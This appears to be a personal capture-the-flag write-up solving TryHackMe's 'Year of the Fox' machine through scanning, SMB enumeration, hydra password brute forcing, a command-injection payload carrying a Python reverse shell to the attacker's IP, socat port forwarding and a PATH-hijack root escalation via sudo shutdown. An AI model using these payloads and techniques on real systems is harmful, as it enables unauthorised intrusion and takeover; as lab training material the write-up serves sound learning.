Year of the Fox on TryHackMe

, , ,

Before all

A fun and relaxing one, my second time to solve a HARD machine on TryHackMe.

Victim’s IP : 10.10.150.100
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan

Command: 

1
nmap -sC -sV -Pn 10.10.150.100

Result:
image

well … a web service and a bunch of smb service, speaking honestly, I was shocked……(cause I’m not familiar with smb yet).

enum4linux

enum4linux is a tool being used to leak some informations from a vulnerable linux machine.
Command: 

1
enum4linux 10.10.150.100

Result:
There was sooooo many informations leaked, but I only used this XD.
image
There are two UNIX users, fox and rescal.

Exploitation

http auth brute forcing

The web application on port 80 have a http auth, and I used hydra to brute force the password with usernames leaked by enum4linux
Command: 

1
hydra -l rascal -P /home/kali/rockyou.txt -t 64 10.10.150.100 http-get

Result:
image

command injection

After accessing the web application, it looked like this…….

image

It allows user to search for files, which give me an idea to use command injection attack.
Payload: 

1
{"target":"\"; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.9.195.189\",1004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")' ;#"}

Of course, I opened port 1004 to receive shell from victim.

ssh brute forcing

Command: 

1
ss -tulnp

Result:

image

well…there’s a ssh service in innet, it would be easier to brute force the user’s password from outnet.

So I wanted to download socat into victim’s machine from my computer so I could open another port on victim’s machine which pass through the innet ssh service, well…….

image
Permission denied !
So I searched for folder with a writable permission…
Command: 

1
2
cd /
ls -al

image
P.S. Don’t forget to change permission for it~ 

1
chmod +x socat

The tmp folder can be used !
Now, is time to open ssh service to outnet with socat!
Command: 

1
./socat tcp-listen:5427,reuseaddr,fork tcp:localhost:22

Finally, here brute forcing is~
Command: 

1
hydra -l fox -P /home/kali/rockyou.txt -t 64 ssh://10.10.150.100 -s 5427

Result:
image

Now log in with the informations~

image

Privilege Escalation

poweroff escalation

First of all, check my permission with sudo -l:

image

I setup a http server from it to find out how /usr/bin/shutdown work……
Reverse Engineering with ghidra:
image
…….
well, well, well…
After that, I searched for the poweroff command on GTFOBins
image
Nothing found.
WHAT?!!
And finally, I found out this:
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation/
Command: 

1
2
3
4
echo /bin/bash > /tmp/poweroff
chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
sudo /usr/sbin/shutdown

And finally… get root!!!
But what?
image
Kinda tricky(
Just a simple hide&see though… 

1
find / | grep root

image
Aha!
image
So…
who can tell me the meaning of: 

1
2
YTAyNzQ3ODZlMmE2MjcwNzg2NjZkNjQ2Nzc5NzA0NjY2Njc2NjY4M2I2OTMyMzIzNTNhNjk2ODMw
Mwo=

:>
🦈🐋🦈🐋

After all

Now stucked on Year of the Dog :<